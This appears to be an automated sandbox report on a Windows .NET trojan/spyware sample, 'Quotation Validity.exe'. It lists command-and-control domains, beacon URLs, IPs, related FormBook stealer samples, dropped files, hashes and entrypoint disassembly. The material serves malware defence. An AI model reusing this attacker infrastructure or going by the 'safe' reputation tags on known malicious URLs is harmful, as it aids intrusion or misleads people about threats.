                      http://www.beyondfitness.live/fbpt/?6NVpdLF=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw9U1Fq6zryNJuPCt39bkn3VWjex276Q==&_jVx=rlV0_TQ810%Avira URL Cloudsafe
                      http://www.yc791022.asia/wu7k/?6NVpdLF=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP+ofPy3OtxFAtreRUZwpBdqa4QiZw9w==&_jVx=rlV0_TQ810%Avira URL Cloudsafe
                      http://www.smartcongress.net0%Avira URL Cloudsafe
                      http://www.cyperla.xyz/qygv/?_jVx=rlV0_TQ81&6NVpdLF=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgueYbl0NkgEkN4ghVwMkIOvivrFpog==0%Avira URL Cloudsafe
                      http://www.goldstarfootwear.shop/8m07/0%Avira URL Cloudsafe
                      http://www.dietcoffee.online/dm4p/?6NVpdLF=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AzFSQlsxYI3pCP4WG49cxd9TY9P6nbg==&_jVx=rlV0_TQ810%Avira URL Cloudsafe
                      http://www.jalan2.online/ykgd/?_jVx=rlV0_TQ81&6NVpdLF=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/wtvWbtjylB0D75gbWHC72kMsIY/h9A==0%Avira URL Cloudsafe
                      http://www.beyondfitness.live/fbpt/0%Avira URL Cloudsafe
                      https://www.cstrategy.online/qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC0%Avira URL Cloudsafe
                      http://www.cstrategy.online/qx5d/0%Avira URL Cloudsafe
                      http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.070002018.xyz
                      		161.97.142.144
                      		truetrue
                        		unknown
                        www.beyondfitness.live
                        		209.74.77.107
                        		truefalse
                          		unknown
                          goldstarfootwear.shop
                          		3.33.130.190
                          		truefalse
                            		unknown
                            cstrategy.online
                            		194.76.119.60
                            		truefalse
                              		unknown
                              www.madhf.tech
                              		103.224.182.242
                              		truefalse
                                		high
                                smartcongress.net
                                		146.88.233.115
                                		truefalse
                                  		unknown
                                  www.dietcoffee.online
                                  		77.68.64.45
                                  		truefalse
                                    		unknown
                                    cyperla.xyz
                                    		31.186.11.114
                                    		truetrue
                                      		unknown
                                      www.bser101pp.buzz
                                      		172.67.158.106
                                      		truefalse
                                        		high
                                        www.bienmaigrir.info
                                        		35.220.176.144
                                        		truefalse
                                          		high
                                          www.yc791022.asia
                                          		101.35.209.183
                                          		truefalse
                                            		unknown
                                            jalan2.online
                                            		108.181.189.7
                                            		truefalse
                                              		unknown
                                              www.cstrategy.online
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.cyperla.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.jalan2.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.goldstarfootwear.shop
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.alihones.lol
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.smartcongress.net
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.bienmaigrir.info/7yhf/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.smartcongress.net/qtfx/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yc791022.asia/wu7k/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jalan2.online/ykgd/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.smartcongress.net/qtfx/?6NVpdLF=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLKl2XaG/4RF1XL2skPecvq2g7m0aOng==&_jVx=rlV0_TQ81false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dietcoffee.online/dm4p/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bser101pp.buzz/v89f/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.070002018.xyz/6m2n/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.madhf.tech/6ou6/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bser101pp.buzz/v89f/?6NVpdLF=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwLEpkgrXXmS6Zwq+X4n7/LWdMx9Q7w==&_jVx=rlV0_TQ81false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dietcoffee.online/dm4p/?6NVpdLF=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AzFSQlsxYI3pCP4WG49cxd9TY9P6nbg==&_jVx=rlV0_TQ81false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cyperla.xyz/qygv/?_jVx=rlV0_TQ81&6NVpdLF=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgueYbl0NkgEkN4ghVwMkIOvivrFpog==false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.goldstarfootwear.shop/8m07/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.beyondfitness.live/fbpt/?6NVpdLF=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw9U1Fq6zryNJuPCt39bkn3VWjex276Q==&_jVx=rlV0_TQ81false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ==false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yc791022.asia/wu7k/?6NVpdLF=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP+ofPy3OtxFAtreRUZwpBdqa4QiZw9w==&_jVx=rlV0_TQ81false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.beyondfitness.live/fbpt/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jalan2.online/ykgd/?_jVx=rlV0_TQ81&6NVpdLF=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/wtvWbtjylB0D75gbWHC72kMsIY/h9A==false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cstrategy.online/qx5d/false
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabisoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cacQuotation Validity.exefalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.smartcongress.netKnETAajUsFuuTQ.exe, 0000000D.00000002.3734770459.0000000004CE7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.cstrategy.online/qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RCisoburn.exe, 0000000C.00000002.3733320595.00000000059D6000.00000004.10000000.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000002.3732486817.0000000002DB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajPKnETAajUsFuuTQ.exe, 0000000D.00000002.3732486817.0000000002F48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              101.35.209.183
                                                                              		www.yc791022.asiaChina
                                                                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                              77.68.64.45
                                                                              		www.dietcoffee.onlineUnited Kingdom
                                                                              		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                              146.88.233.115
                                                                              		smartcongress.netFrance
                                                                              		53589PLANETHOSTER-8CAfalse
                                                                              161.97.142.144
                                                                              		www.070002018.xyzUnited States
                                                                              		51167CONTABODEtrue
                                                                              209.74.77.107
                                                                              		www.beyondfitness.liveUnited States
                                                                              		31744MULTIBAND-NEWHOPEUSfalse
                                                                              108.181.189.7
                                                                              		jalan2.onlineCanada
                                                                              		852ASN852CAfalse
                                                                              31.186.11.114
                                                                              		cyperla.xyzTurkey
                                                                              		199484BETAINTERNATIONALTRtrue
                                                                              103.224.182.242
                                                                              		www.madhf.techAustralia
                                                                              		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                              194.76.119.60
                                                                              		cstrategy.onlineItaly
                                                                              		202675KELIWEBITfalse
                                                                              35.220.176.144
                                                                              		www.bienmaigrir.infoUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              172.67.158.106
                                                                              		www.bser101pp.buzzUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              3.33.130.190
                                                                              		goldstarfootwear.shopUnited States
                                                                              		8987AMAZONEXPANSIONGBfalse

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1566632
                                                                              Start date and time:2024-12-02 14:41:45 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 11m 24s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:17
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Quotation Validity.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@19/12
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 93%
                                                                              • Number of executed functions: 107
                                                                              • Number of non-executed functions: 250
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • VT rate limit hit for: Quotation Validity.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              08:42:37API Interceptor2x Sleep call for process: Quotation Validity.exe modified
                                                                              08:43:56API Interceptor9272042x Sleep call for process: isoburn.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              101.35.209.183PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                              • www.yc791022.asia/31pt/
                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • www.yc791022.asia/wu7k/
                                                                              PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                              • www.yc791022.asia/grmn/
                                                                              77.68.64.45Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • www.dietcoffee.online/dm4p/
                                                                              146.88.233.115W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.smartcongress.net/11t3/
                                                                              Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.smartcongress.net/11t3/
                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • www.smartcongress.net/qtfx/
                                                                              PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                              • www.smartcongress.net/11t3/
                                                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                                                              • www.smartcongress.net/11t3/
                                                                              payments.exeGet hashmaliciousFormBookBrowse
                                                                              • www.smartcongress.net/11t3/
                                                                              161.97.142.144Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                              • www.030002613.xyz/xd9h/
                                                                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.030002449.xyz/cfqm/
                                                                              PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • www.070001955.xyz/7zj0/
                                                                              W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.54248711.xyz/jm2l/
                                                                              IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.030002613.xyz/xd9h/
                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • www.070002018.xyz/6m2n/
                                                                              PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                              • www.54248711.xyz/jm2l/
                                                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                                                              • www.54248711.xyz/jm2l/
                                                                              payments.exeGet hashmaliciousFormBookBrowse
                                                                              • www.54248711.xyz/jm2l/
                                                                              Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.070002018.xyz/zffa/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.madhf.techBASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                              • 15.204.67.7
                                                                              Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 103.224.182.242
                                                                              Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 103.224.182.242
                                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 103.224.182.242
                                                                              Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                              • 103.224.182.242
                                                                              www.beyondfitness.livePurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • 209.74.77.107
                                                                              www.070002018.xyzPurchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • 161.97.142.144
                                                                              Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 161.97.142.144
                                                                              www.dietcoffee.onlineIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 77.68.64.45
                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • 77.68.64.45

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ONEANDONE-ASBrauerstrasse48DEComprobante de pago.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 213.165.67.118
                                                                              arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 77.68.92.70
                                                                              Beschwerde-Rechtsanwalt.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 217.160.0.183
                                                                              Beschwerde-AutoKauf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                              • 217.160.0.118
                                                                              specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 217.160.0.200
                                                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                              • 74.208.23.56
                                                                              https://www.campus-teranga.com/public/redirect?url=https://lhuserer.com/bm/#XYWxleGFuZGVyLmtlZHppb3JAYXNodXJzdC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                              • 74.208.236.218
                                                                              ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 217.160.0.200
                                                                              attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 74.208.236.156
                                                                              splarm5.elfGet hashmaliciousUnknownBrowse
                                                                              • 104.192.5.161
                                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNbotx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                              • 162.62.116.233
                                                                              m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                              • 101.32.73.21
                                                                              loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                              • 162.62.73.78
                                                                              https://zfrmz.com/mH78Gmbnl9SICcogz2hNGet hashmaliciousHTMLPhisherBrowse
                                                                              • 170.106.97.198
                                                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                                                              • 101.34.151.45
                                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                              • 101.33.132.16
                                                                              https://vectaire.doclawfederal.com/uDLtT/Get hashmaliciousHTMLPhisherBrowse
                                                                              • 49.51.77.119
                                                                              apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                              • 101.34.126.81
                                                                              apep.arm6.elfGet hashmaliciousMiraiBrowse
                                                                              • 129.226.178.124
                                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                              • 101.35.209.183
                                                                              PLANETHOSTER-8CAW3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 146.88.233.115
                                                                              Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 146.88.233.115
                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                              • 146.88.233.115
                                                                              PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                              • 146.88.233.115
                                                                              Quotation.exeGet hashmaliciousFormBookBrowse
                                                                              • 146.88.233.115
                                                                              payments.exeGet hashmaliciousFormBookBrowse
                                                                              • 146.88.233.115
                                                                              https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                              • 146.88.234.239
                                                                              EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 199.16.129.175
                                                                              Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                              • 85.236.153.44
                                                                              Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 199.16.129.175
                                                                              CONTABODEOrder MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                              • 161.97.142.144
                                                                              tDLozbx48F.exeGet hashmaliciousGurcu StealerBrowse
                                                                              • 167.86.115.218
                                                                              Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                              • 161.97.124.96
                                                                              specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 161.97.168.245
                                                                              loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                              • 5.189.147.239
                                                                              Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 161.97.142.144
                                                                              OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                              • 161.97.168.245
                                                                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 161.97.142.144
                                                                              ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 161.97.168.245
                                                                              PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • 161.97.142.144

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation Validity.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Quotation Validity.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Temp\l420377x

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\isoburn.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.1211596417522893
                                                                              Encrypted:false
                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                              MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                              SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                              SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                              SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.8438260318907735
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Quotation Validity.exe
                                                                              File size:919'040 bytes
                                                                              MD5:10f86c0378f3f9eabae2129174962df1
                                                                              SHA1:177887de20bd548063d7df47baf2893d519341a7
                                                                              SHA256:0ba8526b6a258a291665a487377351ede1601f0afcf74380556abbd789af669e
                                                                              SHA512:ba09c4bc65cd3e77b17ad44b53759a2de625ec6b2323dc39b7f5489b4b2e96543c3960c48cdb45c5e83ca67fd72cb81a9942497191af9577354ae191af8642b8
                                                                              SSDEEP:24576:D2xj4LCnYnAW8oVwZcX0isGkR6uyr6J+Q272kY:yRnYAWMcXIGkRfyr8+37J
                                                                              TLSH:98151264139FE506C4D11F788967E7F486789DC9E811C70BABDABEEFB87721624403A0
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@................................

                                                                              File Icon

                                                                              Icon Hash:099bce4dd131078e

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4dc71a
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6747F288 [Thu Nov 28 04:33:12 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              adc dword ptr [eax], eax
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [esi], bh
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+00h], al
                                                                              add byte ptr [eax], al
                                                                              push edi
                                                                              add byte ptr [eax], al
